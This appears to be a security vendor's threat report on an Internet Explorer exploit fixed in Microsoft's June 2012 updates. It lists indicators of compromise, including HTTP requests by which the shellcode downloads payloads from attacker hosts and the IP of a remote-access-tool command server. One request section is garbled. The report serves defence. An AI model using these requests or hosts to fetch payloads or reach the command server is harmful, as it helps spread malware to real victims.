Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.
We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:
https://otx.alienvault.com/indicator/ip/113.10.241.239/
The exploit supports a wide range of languages and Windows versions and seems to be very reliable.
The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.
The shellcode downloads the payload from the following url:
GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive
A couple of days ago the AV detection rate was 3/41.
Other versions of the exploit have been found in different servers requesting the following payloads:
GET /engli
*
th.1)
109.236.143
and
GET /img/books.cab HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive
The payloads seems to be RAT (Remote Access Tools).
The C&C server for that RAT is online (ip address 219.90.117.132)
219.90.117.128 - 219.90.117.159
China Shenzhen Soul Tech Co. Ltd
We will release more information as soon as we analyze the components involved on this attack.
